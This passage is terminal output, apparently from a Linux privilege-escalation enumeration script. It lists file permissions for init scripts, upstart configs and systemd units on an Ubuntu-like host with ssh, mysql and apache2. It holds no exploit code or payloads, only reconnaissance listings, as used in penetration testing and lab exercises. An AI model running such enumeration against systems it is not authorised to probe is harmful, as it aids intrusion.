-rwxr-xr-x  1 root root 2796 Feb  3  2016 rsyslog
-rwxr-xr-x  1 root root 1226 Jun  9  2015 screen-cleanup
-rwxr-xr-x  1 root root 3927 Jan 19  2016 sendsigs
-rwxr-xr-x  1 root root  597 Jan 19  2016 single
-rw-r--r--  1 root root 1087 Jan 19  2016 skeleton
-rwxr-xr-x  1 root root 4077 Aug 21 10:45 ssh
-rwxr-xr-x  1 root root 6087 Apr 12  2016 udev
-rwxr-xr-x  1 root root 2049 Aug  7  2014 ufw
-rwxr-xr-x  1 root root 2737 Jan 19  2016 umountfs
-rwxr-xr-x  1 root root 2202 Jan 19  2016 umountnfs.sh
-rwxr-xr-x  1 root root 1879 Jan 19  2016 umountroot
-rwxr-xr-x  1 root root 3111 Jan 19  2016 urandom
-rwxr-xr-x  1 root root 1306 May 16  2018 uuidd
-rwxr-xr-x  1 root root 2757 Jan 19  2017 x11-common


[00;31m[-] /etc/init/ config file permissions:[00m
total 132
drwxr-xr-x  2 root root 4096 Nov 27 06:04 .
drwxr-xr-x 93 root root 4096 Jan 13 13:19 ..
-rw-r--r--  1 root root 3709 Mar  3  2017 apparmor.conf
-rw-r--r--  1 root root  250 Apr  4  2016 console-font.conf
-rw-r--r--  1 root root  509 Apr  4  2016 console-setup.conf
-rw-r--r--  1 root root  297 Apr  5  2016 cron.conf
-rw-r--r--  1 root root  482 Sep  1  2015 dbus.conf
-rw-r--r--  1 root root 1247 Jun  1  2015 friendly-recovery.conf
-rw-r--r--  1 root root  284 Jul 23  2013 hostname.conf
-rw-r--r--  1 root root  300 May 21  2014 hostname.sh.conf
-rw-r--r--  1 root root  561 Mar 14  2016 hwclock-save.conf
-rw-r--r--  1 root root  674 Mar 14  2016 hwclock.conf
-rw-r--r--  1 root root  109 Mar 14  2016 hwclock.sh.conf
-rw-r--r--  1 root root  597 Apr 11  2016 irqbalance.conf
-rw-r--r--  1 root root  689 Aug 20  2015 kmod.conf
-rw-r--r--  1 root root 1757 Feb  3  2017 mysql.conf
-rw-r--r--  1 root root  530 Jun  2  2015 network-interface-container.conf
-rw-r--r--  1 root root 1756 Jun  2  2015 network-interface-security.conf
-rw-r--r--  1 root root  933 Jun  2  2015 network-interface.conf
-rw-r--r--  1 root root 2493 Jun  2  2015 networking.conf
-rw-r--r--  1 root root  568 Feb  1  2016 passwd.conf
-rw-r--r--  1 root root  363 Jun  5  2014 procps-instance.conf
-rw-r--r--  1 root root  119 Jun  5  2014 procps.conf
-rw-r--r--  1 root root  457 Jun  3  2015 resolvconf.conf
-rw-r--r--  1 root root  426 Dec  2  2015 rsyslog.conf
-rw-r--r--  1 root root  230 Apr  4  2016 setvtrgb.conf
-rw-r--r--  1 root root  641 Aug 21 10:45 ssh.conf
-rw-r--r--  1 root root  337 Apr 12  2016 udev.conf
-rw-r--r--  1 root root  360 Apr 12  2016 udevmonitor.conf
-rw-r--r--  1 root root  352 Apr 12  2016 udevtrigger.conf
-rw-r--r--  1 root root  473 Aug  7  2014 ufw.conf
-rw-r--r--  1 root root  683 Feb 24  2015 ureadahead-other.conf
-rw-r--r--  1 root root  889 Feb 24  2015 ureadahead.conf


[00;31m[-] /lib/systemd/* config file permissions:[00m
/lib/systemd/:
total 8.3M
drwxr-xr-x 27 root root  16K Nov 28 09:40 system
drwxr-xr-x  2 root root 4.0K Nov 27 00:41 system-sleep
drwxr-xr-x  2 root root 4.0K Nov 27 00:39 system-preset
drwxr-xr-x  2 root root 4.0K Nov 27 00:39 system-generators
drwxr-xr-x  2 root root 4.0K Nov 27 00:39 network
-rwxr-xr-x  1 root root 443K Jul 30  2018 systemd-udevd
-rwxr-xr-x  1 root root 333K Jul 30  2018 systemd-timedated
-rwxr-xr-x  1 root root  55K Jul 30  2018 systemd-activate
-rwxr-xr-x  1 root root 332K Jul 30  2018 systemd-hostnamed
-rwxr-xr-x  1 root root  51K Jul 30  2018 systemd-modules-load
-rwxr-xr-x  1 root root  91K Jul 30  2018 systemd-socket-proxyd
-rwxr-xr-x  1 root root 268K Jul 30  2018 systemd-cgroups-agent
-rwxr-xr-x  1 root root 301K Jul 30  2018 systemd-fsck
-rwxr-xr-x  1 root root  31K Jul 30  2018 systemd-hibernate-resume
-rwxr-xr-x  1 root root  35K Jul 30  2018 systemd-quotacheck
-rwxr-xr-x  1 root root  31K Jul 30  2018 systemd-reply-password
-rwxr-xr-x  1 root root  91K Jul 30  2018 systemd-backlight
-rwxr-xr-x  1 root root 657K Jul 30  2018 systemd-resolved
-rwxr-xr-x  1 root root  71K Jul 30  2018 systemd-sleep
-rwxr-xr-x  1 root root  55K Jul 30  2018 systemd-sysctl
-rwxr-xr-x  1 root root 103K Jul 30  2018 systemd-bootchart
-rwxr-xr-x  1 root root  51K Jul 30  2018 systemd-remount-fs
-rwxr-xr-x  1 root root  91K Jul 30  2018 systemd-rfkill
-rwxr-xr-x  1 root root 276K Jul 30  2018 systemd-update-utmp
-rwxr-xr-x  1 root root  91K Jul 30  2018 systemd-cryptsetup
-rwxr-xr-x  1 root root 276K Jul 30  2018 systemd-initctl
-rwxr-xr-x  1 root root 836K Jul 30  2018 systemd-networkd
-rwxr-xr-x  1 root root  35K Jul 30  2018 systemd-random-seed
-rwxr-xr-x  1 root root  75K Jul 30  2018 systemd-fsckd
-rwxr-xr-x  1 root root 319K Jul 30  2018 systemd-journald
-rwxr-xr-x  1 root root 605K Jul 30  2018 systemd-logind
-rwxr-xr-x  1 root root  47K Jul 30  2018 systemd-binfmt
-rwxr-xr-x  1 root root 352K Jul 30  2018 systemd-bus-proxyd
-rwxr-xr-x  1 root root 340K Jul 30  2018 systemd-localed
-rwxr-xr-x  1 root root 1.6M Jul 30  2018 systemd
-rwxr-xr-x  1 root root  15K Jul 30  2018 systemd-ac-power
-rwxr-xr-x  1 root root 139K Jul 30  2018 systemd-timesyncd
-rwxr-xr-x  1 root root  35K Jul 30  2018 systemd-user-sessions
-rwxr-xr-x  1 root root 123K Jul 30  2018 systemd-networkd-wait-online
-rwxr-xr-x  1 root root 143K Jul 30  2018 systemd-shutdown
-rwxr-xr-x  1 root root 1.3K Feb 21  2018 systemd-sysv-install
drwxr-xr-x  2 root root 4.0K Apr 12  2016 system-shutdown

/lib/systemd/system:
total 824K
lrwxrwxrwx 1 root root    9 Nov 28 09:40 screen-cleanup.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Nov 27 05:49 apache2.service.d
drwxr-xr-x 2 root root 4.0K Nov 27 00:41 halt.target.wants
drwxr-xr-x 2 root root 4.0K Nov 27 00:41 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Nov 27 00:41 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Nov 27 00:41 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Nov 27 00:41 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Nov 27 00:41 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Nov 27 00:41 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Nov 27 00:41 sockets.target.wants
lrwxrwxrwx 1 root root    9 Nov 27 00:39 x11-common.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Nov 27 00:39 timers.target.wants
lrwxrwxrwx 1 root root   21 Nov 27 00:39 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root    9 Nov 27 00:39 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root   27 Nov 27 00:39 urandom.service -> systemd-random-seed.service
drwxr-xr-x 2 root root 4.0K Nov 27 00:39 systemd-resolved.service.d
drwxr-xr-x 2 root root 4.0K Nov 27 00:39 systemd-timesyncd.service.d
lrwxrwxrwx 1 root root   16 Nov 27 00:39 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Nov 27 00:39 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root    9 Nov 27 00:39 sendsigs.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Nov 27 00:39 sigpwr.target.wants
lrwxrwxrwx 1 root root    9 Nov 27 00:39 single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 stop-bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root   17 Nov 27 00:39 runlevel4.target -> multi-user.target
drwxr-xr-x 2 root root 4.0K Nov 27 00:39 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Nov 27 00:39 resolvconf.service.wants
lrwxrwxrwx 1 root root    9 Nov 27 00:39 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root   15 Nov 27 00:39 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Nov 27 00:39 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Nov 27 00:39 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Nov 27 00:39 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   22 Nov 27 00:39 procps.service -> systemd-sysctl.service
drwxr-xr-x 2 root root 4.0K Nov 27 00:39 rc-local.service.d
lrwxrwxrwx 1 root root   16 Nov 27 00:39 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root    9 Nov 27 00:39 rc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 rcS.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 reboot.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 hostname.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 hwclock.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root   28 Nov 27 00:39 kmod.service -> systemd-modules-load.service
drwxr-xr-x 2 root root 4.0K Nov 27 00:39 local-fs.target.wants
lrwxrwxrwx 1 root root   28 Nov 27 00:39 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root    9 Nov 27 00:39 motd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 mountall.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 mountnfs.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Nov 27 00:39 getty.target.wants
drwxr-xr-x 2 root root 4.0K Nov 27 00:39 graphical.target.wants
lrwxrwxrwx 1 root root    9 Nov 27 00:39 halt.service -> /dev/null
lrwxrwxrwx 1 root root   22 Nov 27 00:39 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   24 Nov 27 00:39 dbus-org.freedesktop.network1.service -> systemd-networkd.service
lrwxrwxrwx 1 root root   24 Nov 27 00:39 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service
lrwxrwxrwx 1 root root   25 Nov 27 00:39 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
lrwxrwxrwx 1 root root   16 Nov 27 00:39 default.target -> graphical.target
lrwxrwxrwx 1 root root    9 Nov 27 00:39 fuse.service -> /dev/null
lrwxrwxrwx 1 root root   14 Nov 27 00:39 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root    9 Nov 27 00:39 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 checkroot.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 Nov 27 00:39 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root   13 Nov 27 00:39 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 Nov 27 00:39 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 Nov 27 00:39 dbus-org.freedesktop.locale1.service -> systemd-localed.service
-rw-r--r-- 1 root root  445 Aug 21 10:45 ssh.service
-rw-r--r-- 1 root root  216 Aug 21 10:45 ssh.socket
-rw-r--r-- 1 root root  196 Aug 21 10:45 ssh@.service
drwxr-xr-x 2 root root 4.0K Jul 30  2018 busnames.target.wants
-rw-r--r-- 1 root root 1.2K Jul 30  2018 systemd-logind.service
-rw-r--r-- 1 root root  685 Jul 30  2018 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 1.3K Jul 30  2018 systemd-networkd.service
-rw-r--r-- 1 root root  907 Jul 30  2018 systemd-resolved.service
-rw-r--r-- 1 root root  655 Jul 30  2018 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Jul 30  2018 systemd-timesyncd.service
-rw-r--r-- 1 root root  573 Jul 30  2018 systemd-user-sessions.service
-rw-r--r-- 1 root root 1010 Jul 30  2018 debug-shell.service
-rw-r--r-- 1 root root  630 Jul 30  2018 initrd-cleanup.service
-rw-r--r-- 1 root root  790 Jul 30  2018 initrd-parse-etc.service
-rw-r--r-- 1 root root  640 Jul 30  2018 initrd-switch-root.service
-rw-r--r-- 1 root root  664 Jul 30  2018 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root  677 Jul 30  2018 kmod-static-nodes.service
-rw-r--r-- 1 root root  473 Jul 30  2018 mail-transport-agent.target
-rw-r--r-- 1 root root  568 Jul 30  2018 quotaon.service
-rw-r--r-- 1 root root  612 Jul 30  2018 rc-local.service
-rw-r--r-- 1 root root  724 Jul 30  2018 systemd-backlight@.service
-rw-r--r-- 1 root root  959 Jul 30  2018 systemd-binfmt.service
-rw-r--r-- 1 root root  650 Jul 30  2018 systemd-bootchart.service
-rw-r--r-- 1 root root 1.0K Jul 30  2018 systemd-bus-proxyd.service
-rw-r--r-- 1 root root  551 Jul 30  2018 systemd-fsckd.service
-rw-r--r-- 1 root root  631 Jul 30  2018 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root  501 Jul 30  2018 systemd-hibernate.service
-rw-r--r-- 1 root root  710 Jul 30  2018 systemd-hostnamed.service
-rw-r--r-- 1 root root  778 Jul 30  2018 systemd-hwdb-update.service
-rw-r--r-- 1 root root  519 Jul 30  2018 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  731 Jul 30  2018 systemd-journal-flush.service
-rw-r--r-- 1 root root 1.3K Jul 30  2018 systemd-journald.service
-rw-r--r-- 1 root root  691 Jul 30  2018 systemd-localed.service
-rw-r--r-- 1 root root  693 Jul 30  2018 systemd-machine-id-commit.service
-rw-r--r-- 1 root root  967 Jul 30  2018 systemd-modules-load.service
-rw-r--r-- 1 root root  614 Jul 30  2018 systemd-quotacheck.service
-rw-r--r-- 1 root root  717 Jul 30  2018 systemd-random-seed.service
-rw-r--r-- 1 root root  696 Jul 30  2018 systemd-rfkill.service
-rw-r--r-- 1 root root  598 Jul 30  2018 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  703 Jul 30  2018 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  683 Jul 30  2018 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  823 Jul 30  2018 systemd-udev-settle.service
-rw-r--r-- 1 root root  743 Jul 30  2018 systemd-udev-trigger.service
-rw-r--r-- 1 root root  825 Jul 30  2018 systemd-udevd.service
-rw-r--r-- 1 root root  757 Jul 30  2018 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  754 Jul 30  2018 systemd-update-utmp.service
-rw-r--r-- 1 root root  770 Jul 30  2018 console-getty.service
-rw-r--r-- 1 root root  742 Jul 30  2018 console-shell.service
-rw-r--r-- 1 root root  791 Jul 30  2018 container-getty@.service
-rw-r--r-- 1 root root 1009 Jul 30  2018 emergency.service
-rw-r--r-- 1 root root 1.5K Jul 30  2018 getty@.service
-rw-r--r-- 1 root root  978 Jul 30  2018 rescue.service
-rw-r--r-- 1 root root 1.1K Jul 30  2018 serial-getty@.service
-rw-r--r-- 1 root root  653 Jul 30  2018 systemd-ask-password-console.service
-rw-r--r-- 1 root root  681 Jul 30  2018 systemd-ask-password-wall.service
-rw-r--r-- 1 root root  497 Jul 30  2018 systemd-exit.service
-rw-r--r-- 1 root root  674 Jul 30  2018 systemd-fsck-root.service
-rw-r--r-- 1 root root  648 Jul 30  2018 systemd-fsck@.service
-rw-r--r-- 1 root root  544 Jul 30  2018 systemd-halt.service
-rw-r--r-- 1 root root  480 Jul 30  2018 systemd-initctl.service
-rw-r--r-- 1 root root  557 Jul 30  2018 systemd-kexec.service
-rw-r--r-- 1 root root  553 Jul 30  2018 systemd-poweroff.service
-rw-r--r-- 1 root root  548 Jul 30  2018 systemd-reboot.service
-rw-r--r-- 1 root root  757 Jul 30  2018 systemd-remount-fs.service
-rw-r--r-- 1 root root  497 Jul 30  2018 systemd-suspend.service
-rw-r--r-- 1 root root  653 Jul 30  2018 systemd-sysctl.service
-rw-r--r-- 1 root root  528 Jul 30  2018 user@.service
-rw-r--r-- 1 root root  403 Jul 30  2018 -.slice
-rw-r--r-- 1 root root  379 Jul 30  2018 bluetooth.target
-rw-r--r-- 1 root root  358 Jul 30  2018 busnames.target
-rw-r--r-- 1 root root  394 Jul 30  2018 cryptsetup-pre.target
-rw-r--r-- 1 root root  366 Jul 30  2018 cryptsetup.target
-rw-r--r-- 1 root root  670 Jul 30  2018 dev-hugepages.mount
-rw-r--r-- 1 root root  624 Jul 30  2018 dev-mqueue.mount
-rw-r--r-- 1 root root  447 Jul 30  2018 hibernate.target
-rw-r--r-- 1 root root  468 Jul 30  2018 hybrid-sleep.target
-rw-r--r-- 1 root root  691 Jul 30  2018 initrd-switch-root.target
-rw-r--r-- 1 root root  405 Jul 30  2018 machine.slice
-rw-r--r-- 1 root root  377 Jul 30  2018 printer.target
-rw-r--r-- 1 root root  693 Jul 30  2018 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root  603 Jul 30  2018 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root  409 Jul 30  2018 slices.target
-rw-r--r-- 1 root root  380 Jul 30  2018 smartcard.target
-rw-r--r-- 1 root root  380 Jul 30  2018 sound.target
-rw-r--r-- 1 root root  353 Jul 30  2018 swap.target
-rw-r--r-- 1 root root  715 Jul 30  2018 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root  719 Jul 30  2018 sys-kernel-config.mount
-rw-r--r-- 1 root root  662 Jul 30  2018 sys-kernel-debug.mount
-rw-r--r-- 1 root root 1.3K Jul 30  2018 syslog.socket
-rw-r--r-- 1 root root  585 Jul 30  2018 system-update.target
-rw-r--r-- 1 root root  436 Jul 30  2018 system.slice
-rw-r--r-- 1 root root  646 Jul 30  2018 systemd-ask-password-console.path
-rw-r--r-- 1 root root  574 Jul 30  2018 systemd-ask-password-wall.path
-rw-r--r-- 1 root root  409 Jul 30  2018 systemd-bus-proxyd.socket
-rw-r--r-- 1 root root  540 Jul 30  2018 systemd-fsckd.socket
-rw-r--r-- 1 root root  524 Jul 30  2018 systemd-initctl.socket
-rw-r--r-- 1 root root  607 Jul 30  2018 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.1K Jul 30  2018 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root  842 Jul 30  2018 systemd-journald.socket
-rw-r--r-- 1 root root  591 Jul 30  2018 systemd-networkd.socket
-rw-r--r-- 1 root root  617 Jul 30  2018 systemd-rfkill.socket
-rw-r--r-- 1 root root  450 Jul 30  2018 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  578 Jul 30  2018 systemd-udevd-control.socket
-rw-r--r-- 1 root root  570 Jul 30  2018 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root  392 Jul 30  2018 user.slice
-rw-r--r-- 1 root root  879 Jul 30  2018 basic.target
-rw-r--r-- 1 root root  431 Jul 30  2018 emergency.target
-rw-r--r-- 1 root root  501 Jul 30  2018 exit.target
-rw-r--r-- 1 root root  440 Jul 30  2018 final.target
-rw-r--r-- 1 root root  460 Jul 30  2018 getty.target
-rw-r--r-- 1 root root  487 Jul 30  2018 halt.target
-rw-r--r-- 1 root root  553 Jul 30  2018 initrd-fs.target
-rw-r--r-- 1 root root  526 Jul 30  2018 initrd-root-fs.target
-rw-r--r-- 1 root root  671 Jul 30  2018 initrd.target
-rw-r--r-- 1 root root  501 Jul 30  2018 kexec.target
-rw-r--r-- 1 root root  395 Jul 30  2018 local-fs-pre.target
-rw-r--r-- 1 root root  507 Jul 30  2018 local-fs.target
-rw-r--r-- 1 root root  492 Jul 30  2018 multi-user.target
-rw-r--r-- 1 root root  464 Jul 30  2018 network-online.target
-rw-r--r-- 1 root root  461 Jul 30  2018 network-pre.target
-rw-r--r-- 1 root root  480 Jul 30  2018 network.target
-rw-r--r-- 1 root root  514 Jul 30  2018 nss-lookup.target
-rw-r--r-- 1 root root  473 Jul 30  2018 nss-user-lookup.target
-rw-r--r-- 1 root root  354 Jul 30  2018 paths.target
-rw-r--r-- 1 root root  552 Jul 30  2018 poweroff.target
-rw-r--r-- 1 root root  543 Jul 30  2018 reboot.target
-rw-r--r-- 1 root root  396 Jul 30  2018 remote-fs-pre.target
-rw-r--r-- 1 root root  482 Jul 30  2018 remote-fs.target
-rw-r--r-- 1 root root  486 Jul 30  2018 rescue.target
-rw-r--r-- 1 root root  500 Jul 30  2018 rpcbind.target
-rw-r--r-- 1 root root  402 Jul 30  2018 shutdown.target
-rw-r--r-- 1 root root  362 Jul 30  2018 sigpwr.target
-rw-r--r-- 1 root root  420 Jul 30  2018 sleep.target
-rw-r--r-- 1 root root  356 Jul 30  2018 sockets.target
-rw-r--r-- 1 root root  441 Jul 30  2018 suspend.target
-rw-r--r-- 1 root root  518 Jul 30  2018 sysinit.target
-rw-r--r-- 1 root root  395 Jul 30  2018 time-sync.target
-rw-r--r-- 1 root root  405 Jul 30  2018 timers.target
-rw-r--r-- 1 root root  417 Jul 30  2018 umount.target
-rw-r--r-- 1 root root  558 Jul 30  2018 graphical.target
-rw-r--r-- 1 root root  238 Jun 26  2018 apt-daily-upgrade.service
-rw-r--r-- 1 root root  184 Jun 26  2018 apt-daily-upgrade.timer
-rw-r--r-- 1 root root  225 Jun 26  2018 apt-daily.service
-rw-r--r-- 1 root root  156 Jun 26  2018 apt-daily.timer
-rw-r--r-- 1 root root  189 May 16  2018 uuidd.service
-rw-r--r-- 1 root root  126 May 16  2018 uuidd.socket
lrwxrwxrwx 1 root root   27 May  9  2018 plymouth-log.service -> plymouth-read-write.service
lrwxrwxrwx 1 root root   21 May  9  2018 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root  412 May  9  2018 plymouth-halt.service
-rw-r--r-- 1 root root  426 May  9  2018 plymouth-kexec.service
-rw-r--r-- 1 root root  421 May  9  2018 plymouth-poweroff.service
-rw-r--r-- 1 root root  200 May  9  2018 plymouth-quit-wait.service
-rw-r--r-- 1 root root  194 May  9  2018 plymouth-quit.service
-rw-r--r-- 1 root root  244 May  9  2018 plymouth-read-write.service
-rw-r--r-- 1 root root  416 May  9  2018 plymouth-reboot.service
-rw-r--r-- 1 root root  532 May  9  2018 plymouth-start.service
-rw-r--r-- 1 root root  291 May  9  2018 plymouth-switch-root.service
-rw-r--r-- 1 root root  490 May  9  2018 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root  467 May  9  2018 systemd-ask-password-plymouth.service
-rw-r--r-- 1 root root  479 May  8  2018 run-vmblock-fuse.mount
-rw-r--r-- 1 root root  328 Apr 19  2018 open-vm-tools.service
-rw-r--r-- 1 root root  298 Mar 22  2018 vgauth.service
-rw-r--r-- 1 root root  342 Feb 21  2018 getty-static.service
-rw-r--r-- 1 root root  153 Feb 21  2018 sigpwr-container-shutdown.service
-rw-r--r-- 1 root root  175 Feb 21  2018 systemd-networkd-resolvconf-update.path
-rw-r--r-- 1 root root  715 Feb 21  2018 systemd-networkd-resolvconf-update.service
-rw-r--r-- 1 root root  420 Nov 29  2017 resolvconf.service
-rw-r--r-- 1 root root  411 Feb  3  2017 mysql.service
-rw-r--r-- 1 root root  269 Jan 31  2017 setvtrgb.service
-rw-r--r-- 1 root root  491 Jan 12  2017 dbus.service
-rw-r--r-- 1 root root  106 Jan 12  2017 dbus.socket
-rw-r--r-- 1 root root  735 Nov 30  2016 networking.service
-rw-r--r-- 1 root root  497 Nov 30  2016 ifup@.service
-rw-r--r-- 1 root root  631 Nov  3  2016 accounts-daemon.service
-rw-r--r-- 1 root root  285 Jun 16  2016 keyboard-setup.service
-rw-r--r-- 1 root root  288 Jun 16  2016 console-setup.service
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel5.target.wants
-rw-r--r-- 1 root root  251 Apr  5  2016 cron.service
-rw-r--r-- 1 root root  290 Apr  5  2016 rsyslog.service
-rw-r--r-- 1 root root  790 Jun  1  2015 friendly-recovery.service
-rw-r--r-- 1 root root  241 Mar  2  2015 ufw.service
-rw-r--r-- 1 root root  250 Feb 24  2015 ureadahead-stop.service
-rw-r--r-- 1 root root  242 Feb 24  2015 ureadahead-stop.timer
-rw-r--r-- 1 root root  401 Feb 24  2015 ureadahead.service
-rw-r--r-- 1 root root  188 Feb 24  2014 rsync.service

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Jun 11  2018 apache2-systemd.conf

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 May  9  2018 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May  9  2018 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 May  9  2018 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May  9  2018 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Nov 27 00:39 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Nov 27 00:39 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Nov 27 00:39 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Nov 27 00:39 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Nov 27 00:39 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 29 May  9  2018 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
lrwxrwxrwx 1 root root 24 May  9  2018 plymouth-quit.service -> ../plymouth-quit.service
lrwxrwxrwx 1 root root 15 Jan 12  2017 dbus.service -> ../dbus.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Nov 27 00:39 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 28 May  9  2018 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Nov 27 00:39 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 26 May  9  2018 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 37 Nov 27 00:39 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Nov 27 00:39 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 31 Nov 27 00:39 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 24 Nov 27 00:39 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 30 Nov 27 00:39 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 24 Nov 27 00:39 console-setup.service -> ../console-setup.service
lrwxrwxrwx 1 root root 20 Nov 27 00:39 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Nov 27 00:39 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Nov 27 00:39 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 25 Nov 27 00:39 keyboard-setup.service -> ../keyboard-setup.service
lrwxrwxrwx 1 root root 28 Nov 27 00:39 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Nov 27 00:39 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 19 Nov 27 00:39 setvtrgb.service -> ../setvtrgb.service
